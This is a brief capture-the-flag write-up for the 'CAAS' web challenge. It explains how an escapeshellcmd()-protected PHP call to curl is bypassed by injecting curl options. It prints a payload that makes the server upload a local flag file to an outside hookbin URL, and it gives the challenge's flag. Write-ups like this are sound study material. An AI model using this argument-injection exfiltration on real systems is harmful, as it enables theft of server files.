Tags: web php post 

Rating:

### CAAS

#### Problem

- Hint : Outdated Alien technology has been found by the human resistance. The system might contain sensitive information that could be of use to us. Our experts are trying to find a way into the system. Can you help?
This challenge will raise 43 euros for a good cause.

#### Writeup

- Analyze the given files, we can find that "curl -sL" is executed if we send a POST request with ip parameter
- But, it is passed from escapeshellcmd(), which escapes multiple cmds passed in the request.
- So, to fool escapeshellcmd() ,we follow instructions from link
- We spawn a hookbin url and pass the following request using postman
`-d @../../flag https://hookb.in/lJ2wk1D18NcrXXZWdyND`
- -d options passed data and @ fetches the file for curl option.
- We get the flag - `CHTB{f1le_r3trieval_4s_a_s3rv1ce}`

Original writeup (https://github.com/rudradesai200/CTFs/tree/master/CyberApocalypse2021/web_caas).